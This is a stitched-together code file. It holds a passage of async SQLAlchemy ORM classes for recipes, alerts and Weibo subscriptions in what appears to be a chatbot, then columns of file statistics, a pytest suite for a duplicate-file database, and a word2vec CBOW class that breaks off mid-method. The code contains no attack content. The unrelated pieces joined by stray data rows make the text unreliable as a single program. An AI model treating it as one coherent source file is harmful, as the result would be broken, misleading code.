    name = Column(String(16), nullable=False, comment="菜名")
    content = Column(BLOB, nullable=False, primary_key=False, comment="图片")

    def __init__(self, name: str, content: bytes):
        """Populate column values only; no database I/O happens here."""
        self.name = name
        self.content = content

    async def insert(self):
        """Add this recipe unless one with the same name already exists.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the recipe with self.name if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Recipes):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single recipe whose name equals self.name.

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Recipes).where(
                            Recipes.name == self.name))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_all(self):
        """List every recipe row (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Recipes))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Alert(Base):
    """An alert image blob keyed by an external alert_id (several rows may
    share one alert_id; see select_all()).

    All helpers return Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Alert"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    alert_id = Column(String(16), nullable=False, comment="id")
    content = Column(BLOB, nullable=False, primary_key=False, comment="图片")

    def __init__(self, alert_id: str, content: bytes):
        """Populate column values only; no database I/O happens here."""
        self.alert_id = alert_id
        self.content = content

    async def insert(self):
        """Insert this alert row unconditionally (no duplicate check, unlike
        the sibling classes — multiple rows per alert_id are allowed).

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session.add(self)
                        result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the single row matching self.alert_id if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Alert):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row matching self.alert_id.

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error (including when several rows share the id).
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # BUG FIX: the original filter was `Alert.id == Alert.id`, a
                        # tautology that matched every row in the table — any second
                        # row made scalar_one() raise MultipleResultsFound, and a
                        # lone unrelated row was returned regardless of self.
                        # Filter by this instance's alert_id, consistent with
                        # select_all() and with the sibling classes' select().
                        session_result = await session.execute(select(Alert).where(
                            Alert.alert_id == self.alert_id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_all(self):
        """List every row matching self.alert_id (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Alert).where(
                            Alert.alert_id == self.alert_id))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Weibo_Record(Base):
    """A cached Weibo post (rendered image blob) recorded per uid.

    All helpers return Result.IntResult rather than raising.
    """
    __tablename__ = "Weibo_Record"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    uid = Column(String(25), nullable=False, primary_key=False)
    weibo_id = Column(String(25), nullable=False, primary_key=False)
    content = Column(BLOB, nullable=False, primary_key=False)
    time = Column(DATETIME, nullable=False, primary_key=False, default=datetime.now)

    def __init__(self, uid: str):
        """Store only the uid; the remaining columns are set by insert()."""
        self.uid = uid

    async def insert(self, weibo_id: str, content: bytes, time=None):
        """Record a Weibo post unless the weibo_id is already stored.

        BUG FIX: the default was ``time=datetime.now()``, which Python
        evaluates once at import time, so every defaulted call stamped the
        row with module-load time.  ``None`` now means "timestamp at call
        time"; explicit time arguments behave exactly as before.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        self.weibo_id = weibo_id
        self.content = content
        # Resolve the timestamp per call, not per module import.
        self.time = time if time is not None else datetime.now()
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select(weibo_id)
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self, weibo_id: str):
        """Fetch the single record with the given weibo_id (uid is not filtered).

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Weibo_Record).where(
                            Weibo_Record.weibo_id == weibo_id))
                        record = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=record)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_last_weibo_id(self):
        """Return the newest (MAX) weibo_id recorded for self.uid.

        Returns Result.IntResult: the max id in ``result`` when any row exists,
        1 when there is none (MAX over an empty set yields NULL), -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(func.max(Weibo_Record.weibo_id)).where(
                            Weibo_Record.uid == self.uid))
                        record = session_result.scalar_one()
                        if record:
                            result = Result.IntResult(error=False, info="Exist", result=record)
                        else:
                            result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result
class Weibo_Subscription(Base):
    """Maps a Weibo subscription (uid) to a QQ subscriber.

    Structurally identical to Dynamic_Subscription; all helpers return
    Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Weibo_Subscription"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    bot_id = Column(String(16), nullable=False, comment="Bot_id")
    uid = Column(String(16), nullable=False, comment="微博UID")
    subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
    send_type = Column(String(10), nullable=False, comment="私聊/群")

    def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
        """Populate column values only; no database I/O happens here."""
        self.bot_id = bot_id
        self.uid = uid
        self.subscriber_id = subscriber_id
        self.send_type = send_type

    async def insert(self):
        """Add this subscription unless a (uid, subscriber_id) row already exists.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the row matching (self.uid, self.subscriber_id) if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Weibo_Subscription):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row matching (self.uid, self.subscriber_id).

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Weibo_Subscription).where(
                            Weibo_Subscription.uid == self.uid).where(
                            Weibo_Subscription.subscriber_id == self.subscriber_id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_subscribers(self):
        """List every subscription row for self.uid (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Weibo_Subscription).where(
                            Weibo_Subscription.uid == self.uid))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result

    async def select_uids(self):
        """List the distinct uids with at least one subscription (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(distinct(Weibo_Subscription.uid)))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
| 49.326988
| 116
| 0.573543
| 4,584
| 44,049
| 5.363656
| 0.040794
| 0.103469
| 0.093952
| 0.116322
| 0.916013
| 0.914345
| 0.9104
| 0.905763
| 0.89889
| 0.89889
| 0
| 0.005765
| 0.330564
| 44,049
| 892
| 117
| 49.382287
| 0.828032
| 0.003383
| 0
| 0.84901
| 0
| 0
| 0.045521
| 0.021325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013614
| false
| 0
| 0.012376
| 0.001238
| 0.149752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4225d0e5cb735bfbe5bad23ad24224dd047f552
| 119
|
py
|
Python
|
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | 2
|
2018-08-02T04:52:53.000Z
|
2019-09-11T10:02:24.000Z
|
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | null | null | null |
darkopt/optimize/__init__.py
|
iwiwi/darkopt
|
071ecaa422441909d7f077b8097320bb304178d4
|
[
"MIT"
] | 1
|
2019-02-12T05:57:17.000Z
|
2019-02-12T05:57:17.000Z
|
from darkopt.optimize.optimizer import Optimizer # NOQA
from darkopt.optimize.trial_result import TrialResult # NOQA
| 39.666667
| 61
| 0.831933
| 15
| 119
| 6.533333
| 0.6
| 0.22449
| 0.387755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 119
| 2
| 62
| 59.5
| 0.933333
| 0.07563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4580444880f100c51d1ed1435d4b78ea5e0caf9
| 20,224
|
py
|
Python
|
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | null | null | null |
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | 3
|
2022-01-28T15:54:54.000Z
|
2022-01-28T15:58:23.000Z
|
src/tests/test_database.py
|
chris2013/pydupe
|
be8fd2dd2a905899e376be4e0b3d2fc8482e89e6
|
[
"MIT"
] | null | null | null |
import os
import tempfile
import pytest
from pydupe.data import fparms
from pydupe.db import PydupeDB
import pathlib as pl
import typing as tp
@pytest.fixture
def setup_database() -> tp.Generator[None,None,None]:
    """Set up a PydupeDB in a temporary directory, seeded with four rows.

    Two rows share one hash and two share another, giving two duplicate
    groups.  The cwd is switched to the temp dir for the test and restored
    on teardown; the directory itself is removed when the context exits.
    """
    with tempfile.TemporaryDirectory() as newpath:
        old_cwd = os.getcwd()
        os.chdir(newpath)
        dbname = pl.Path.cwd() / ".dbtest.sqlite"
        data = [fparms(filename='/tests/tdata/file_exists',
                       hash='be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
                       size=1,
                       inode=25303464,
                       mtime=1629356592,
                       ctime=1630424506),
                fparms(filename='/tests/tdata/somedir/file_is_dupe',
                       hash='be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6',
                       size=1,
                       inode=25303464,
                       mtime=1629356592,
                       ctime=1630424506),
                fparms(filename='/tests/tdata/somedir/dupe_in_dir',
                       hash='3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
                       size=1,
                       inode=25303464,
                       mtime=1629356592,
                       ctime=1630424506),
                fparms(filename='/tests/tdata/somedir/dupe2_in_dir',
                       hash='3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0',
                       size=1,
                       inode=25303464,
                       mtime=1629356592,
                       ctime=1630424506)]
        with PydupeDB(dbname) as db:
            db.parms_insert(data)
            db.commit()
        yield
        os.chdir(old_cwd)
@pytest.mark.usefixtures("setup_database")
class TestDatabase:
    """Integration tests for PydupeDB against the database created by the
    'setup_database' fixture (four files forming two duplicate groups)."""

    # Hashes inserted by the fixture, plus one fresh hash used for updates.
    HASH_A = 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'
    HASH_B = '3aa2ed13ee40ba651e87a0fd60b753d03aa2ed13ee40ba651e87a0fd60b753d0'
    HASH_NEW = '3aa2ed13ee40ba651e87a0fd60bbbbbb3aa2ed13ee40ba651e87a0fd60bbbbbb'

    # Filenames inserted by the fixture.
    FILE_EXISTS = '/tests/tdata/file_exists'
    FILE_IS_DUPE = '/tests/tdata/somedir/file_is_dupe'
    DUPE_IN_DIR = '/tests/tdata/somedir/dupe_in_dir'
    DUPE2_IN_DIR = '/tests/tdata/somedir/dupe2_in_dir'

    @staticmethod
    def _dbname() -> pl.Path:
        """Path of the test database inside the fixture's temporary CWD."""
        return pl.Path.cwd() / ".dbtest.sqlite"

    @classmethod
    def _row(cls, filename: str, fhash: tp.Optional[str]) -> tp.Dict[str, tp.Any]:
        """Full lookup-table row; all fixture files share the same stat values."""
        return {'filename': filename,
                'hash': fhash,
                'size': 1,
                'inode': 25303464,
                'mtime': 1629356592,
                'ctime': 1630424506}

    @classmethod
    def _fixture_rows(cls) -> tp.List[tp.Dict[str, tp.Any]]:
        """Rows exactly as inserted by the 'setup_database' fixture."""
        return [cls._row(cls.FILE_EXISTS, cls.HASH_A),
                cls._row(cls.FILE_IS_DUPE, cls.HASH_A),
                cls._row(cls.DUPE_IN_DIR, cls.HASH_B),
                cls._row(cls.DUPE2_IN_DIR, cls.HASH_B)]

    @classmethod
    def _somedir_rows(cls) -> tp.List[tp.Dict[str, tp.Any]]:
        """The three fixture rows that live under /tests/tdata/somedir."""
        return [cls._row(cls.FILE_IS_DUPE, cls.HASH_A),
                cls._row(cls.DUPE_IN_DIR, cls.HASH_B),
                cls._row(cls.DUPE2_IN_DIR, cls.HASH_B)]

    def test_insert_get(self) -> None:
        """check data inserted in fixture 'setup_database' works."""
        with PydupeDB(self._dbname()) as db:
            data_dict = [dict(row) for row in db.get().fetchall()]
        assert data_dict == self._fixture_rows()

    def test_update_hash(self) -> None:
        """check hash update works."""
        dbname = self._dbname()
        with PydupeDB(dbname) as db:
            before = [dict(row) for row in db.get().fetchall()]
        assert before == self._fixture_rows()
        # update hash of one file and commit:
        with PydupeDB(dbname) as db:
            db.update_hash([(self.HASH_NEW, self.DUPE2_IN_DIR)])
            db.commit()
        with PydupeDB(dbname) as db:
            after = [dict(row) for row in db.get().fetchall()]
        assert after == [self._row(self.FILE_EXISTS, self.HASH_A),
                         self._row(self.FILE_IS_DUPE, self.HASH_A),
                         self._row(self.DUPE_IN_DIR, self.HASH_B),
                         self._row(self.DUPE2_IN_DIR, self.HASH_NEW)]

    def test_rollback(self) -> None:
        """check auto rollback after e.g. hash update works."""
        dbname = self._dbname()
        with PydupeDB(dbname) as db:
            before = [dict(row) for row in db.get().fetchall()]
        assert before == self._fixture_rows()
        # update hash but do NOT commit -> auto rollback by context manager:
        with PydupeDB(dbname) as db:
            db.update_hash([(self.HASH_NEW, self.DUPE2_IN_DIR)])
        with PydupeDB(dbname) as db:
            after = [dict(row) for row in db.get().fetchall()]
        assert after == self._fixture_rows()

    def test_get_list_of_files_where_hash_is_NULL(self) -> None:
        data = [fparms(
            filename=self.FILE_EXISTS,
            hash=None,
            size=1,
            inode=25303464,
            mtime=1629356592,
            ctime=1630424506)]
        with PydupeDB(self._dbname()) as db:
            # drop the first duplicate group, then re-insert one of its
            # files without a hash:
            db.execute(
                "DELETE from lookup WHERE hash = 'be1c1a22b4055523a0d736f4174ef1d6be1c1a22b4055523a0d736f4174ef1d6'")
            db.parms_insert(data)
            db.commit()
            data_get = db.get_list_of_equal_sized_files_where_hash_is_NULL()
        assert data_get == [self.FILE_EXISTS]

    def test_get_list_of_files_in_dir(self) -> None:
        with PydupeDB(self._dbname()) as db:
            data_get = db.get_list_of_files_in_dir(
                '/tests/tdata/somedir')
        assert data_get == [self.DUPE2_IN_DIR,
                            self.DUPE_IN_DIR,
                            self.FILE_IS_DUPE
                            ]

    def test_get_file_hash(self) -> None:
        with PydupeDB(self._dbname()) as db:
            data_dict = [dict(row) for row in db.get_file_hash()]
        assert data_dict == [
            {'filename': self.FILE_EXISTS, 'hash': self.HASH_A},
            {'filename': self.FILE_IS_DUPE, 'hash': self.HASH_A},
            {'filename': self.DUPE_IN_DIR, 'hash': self.HASH_B},
            {'filename': self.DUPE2_IN_DIR, 'hash': self.HASH_B}
        ]

    def test_delete_dir(self) -> None:
        with PydupeDB(self._dbname()) as db:
            db.delete_dir(pl.Path('/tests/tdata/somedir'))
            data_dict = [dict(row) for row in db.get().fetchall()]
        assert data_dict == [self._row(self.FILE_EXISTS, self.HASH_A)]

    def test_delete_file(self) -> None:
        with PydupeDB(self._dbname()) as db:
            db.delete_file(filename=pl.Path(self.FILE_EXISTS))
            data_dict = [dict(row) for row in db.get_file_hash().fetchall()]
        assert data_dict == [
            {'filename': self.FILE_IS_DUPE, 'hash': self.HASH_A},
            {'filename': self.DUPE_IN_DIR, 'hash': self.HASH_B},
            {'filename': self.DUPE2_IN_DIR, 'hash': self.HASH_B}
        ]

    def test_copy_dir_to_table_permanent(self) -> None:
        """copying a directory into 'permanent' leaves 'lookup' untouched."""
        with PydupeDB(self._dbname()) as db:
            db.copy_dir_to_table_permanent(
                pl.Path('/tests/tdata/somedir'))
            db.commit()
            lookup = [dict(row) for row in db.execute('SELECT * FROM lookup').fetchall()]
            permanent = [dict(row) for row in db.execute('SELECT * FROM permanent').fetchall()]
        assert lookup == self._fixture_rows()
        assert permanent == self._somedir_rows()

    def test_copy_hash_to_table_lookup_and_clear_permanent(self) -> None:
        """hashes snapshotted in 'permanent' are restored into 'lookup'
        (only for filenames present in 'permanent')."""
        dbname = self._dbname()
        with PydupeDB(dbname) as db:
            # snapshot the somedir rows into 'permanent', then clear two hashes:
            db.execute("INSERT INTO permanent SELECT * FROM lookup WHERE filename like '/tests/tdata/somedir%'")
            db.update_hash([(None, self.FILE_EXISTS)])
            db.update_hash([(None, self.FILE_IS_DUPE)])
            db.commit()
            lookup = [dict(row) for row in db.execute('SELECT * FROM lookup').fetchall()]
            permanent = [dict(row) for row in db.execute('SELECT * FROM permanent').fetchall()]
        assert lookup == [self._row(self.FILE_EXISTS, None),
                          self._row(self.FILE_IS_DUPE, None),
                          self._row(self.DUPE_IN_DIR, self.HASH_B),
                          self._row(self.DUPE2_IN_DIR, self.HASH_B)]
        assert permanent == self._somedir_rows()
        with PydupeDB(dbname) as db:
            db.copy_hash_to_table_lookup(check_filename=True)
            db.commit()
            lookup = [dict(row) for row in db.execute('SELECT * FROM lookup').fetchall()]
            permanent = [dict(row) for row in db.execute('SELECT * FROM permanent').fetchall()]
        # only file_is_dupe is present in 'permanent', so only its hash is
        # restored; file_exists keeps its NULL hash:
        assert lookup == [self._row(self.FILE_EXISTS, None),
                          self._row(self.FILE_IS_DUPE, self.HASH_A),
                          self._row(self.DUPE_IN_DIR, self.HASH_B),
                          self._row(self.DUPE2_IN_DIR, self.HASH_B)]
        assert permanent == self._somedir_rows()
| 42.487395
| 117
| 0.571648
| 1,649
| 20,224
| 6.843542
| 0.067314
| 0.059371
| 0.089322
| 0.074967
| 0.932388
| 0.914222
| 0.887993
| 0.886043
| 0.885335
| 0.879663
| 0
| 0.244186
| 0.311116
| 20,224
| 475
| 118
| 42.576842
| 0.56582
| 0.018938
| 0
| 0.866511
| 0
| 0
| 0.362755
| 0.269945
| 0
| 0
| 0
| 0
| 0.037471
| 1
| 0.025761
| false
| 0
| 0.016393
| 0
| 0.044496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f17b39bd411ab6e9d97543967fdaddd5fecacc2d
| 20,041
|
py
|
Python
|
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
word2vec.py
|
houshengyuan/Word2vec
|
8861dce1e9f7043f366ad94146a535d726f72d7c
|
[
"MIT"
] | null | null | null |
import os
import pickle
import time
from os.path import join
from typing import List
import numpy as np
from utils.dataset import Dataset
from utils.vocab import Vocab
from utils.hierarchical_softmax import Huffman_tree
from utils.negative_sampling import NEG
def one_hot(dim: int, idx: int):
    """Return a length-`dim` float vector that is all zeros except for a 1 at `idx`."""
    encoding = np.zeros(dim)
    encoding[idx] = 1
    return encoding
def softmax(x, dim: int = -1):
    """Numerically stable softmax along axis `dim`.

    Subtracting the per-slice maximum before exponentiating prevents
    overflow; `keepdims=True` makes the subtraction and normalisation
    broadcast correctly for inputs of any rank (the original form only
    worked for 1-D input).  The annotation `[int]` was a list literal,
    not a type, and is fixed to `int`.
    """
    e_x = np.exp(x - np.max(x, axis=dim, keepdims=True))
    return e_x / np.sum(e_x, axis=dim, keepdims=True)
def sigmoid(x):
    """Numerically stable element-wise logistic function.

    Works from exp(-|x|), which can never overflow, and selects between
    the two algebraically equivalent forms 1/(1+e^-x) (for x > 0) and
    e^x/(1+e^x) (for x <= 0).
    """
    z = np.exp(-np.fabs(x))
    positive = (x > 0)
    return positive * (1 / (1 + z)) + (1 - positive) * (z / (1 + z))
class CBOW:
    """Continuous-bag-of-words word2vec implemented with plain NumPy.

    The averaged input vectors of the context words predict the center
    word.  The output layer is a full softmax by default, or a Huffman
    tree (hierarchical softmax), or negative sampling.  Training
    progress is appended to a file under log/ whose name encodes the
    enabled options.
    """
    def __init__(self, vocab: Vocab, vector_dim: int,
                 hierarchical_softmax: bool=False, negative_sampling: bool=False,
                 size: int=10, subsampling: bool=False, subsample_thr: float=1e-3):
        """
        :param vocab: vocabulary mapping tokens to integer ids and back
        :param vector_dim: dimensionality N of the word vectors
        :param hierarchical_softmax: use a Huffman-tree output layer
        :param negative_sampling: use negative sampling (only takes effect
            when hierarchical_softmax is False)
        :param size: number of negative samples drawn per training step
        :param subsampling: enable frequent-word subsampling in the sampler
        :param subsample_thr: threshold for the subsampling heuristic
        """
        self.vocab = vocab
        self.vector_dim = vector_dim
        self.hierarchical_softmax = hierarchical_softmax
        self.negative_sampling = negative_sampling
        self.subsampling = subsampling
        self.subsample_thr = subsample_thr
        os.makedirs("log", exist_ok=True)
        # Log file name encodes the enabled options, e.g. log/cbow_neg_sub.txt.
        self.log = open("log/cbow" + ("_hierarchical" if self.hierarchical_softmax else "") + ("_neg" if self.negative_sampling else "")
                        + ("_sub" if self.subsampling else "") + ".txt", "a+")
        self.W1 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N input embedding matrix
        if self.hierarchical_softmax:
            # Output-side parameters live on the internal nodes of the tree.
            self.tree = Huffman_tree(self.vocab, dim=self.vector_dim)
        else:
            self.W2 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N output embeddings (same shape as W1; previous "N x V" comment was wrong)
            if negative_sampling:
                self.sampler=NEG(vocab=self.vocab, alpha=0.75, size=size, subsampling = self.subsampling, subsample_thr = self.subsample_thr)
    def train(self, corpus: str, window_size: int, train_epoch: int, learning_rate: float, save_path: str = None):
        """Train on `corpus` for `train_epoch` epochs.

        Per-epoch loss and timing go to the log file; the model is saved
        once after the final epoch when `save_path` is given.
        """
        dataset = Dataset(corpus, window_size, "CBOW")
        for epoch in range(1, train_epoch + 1):
            start_time = time.time()
            avg_loss = self.train_one_epoch(dataset, learning_rate)
            end_time = time.time()
            print(f"Epoch {epoch}, loss: {avg_loss:.2f}. Cost {(end_time - start_time) / 60:.1f} min",file=self.log,flush=True)
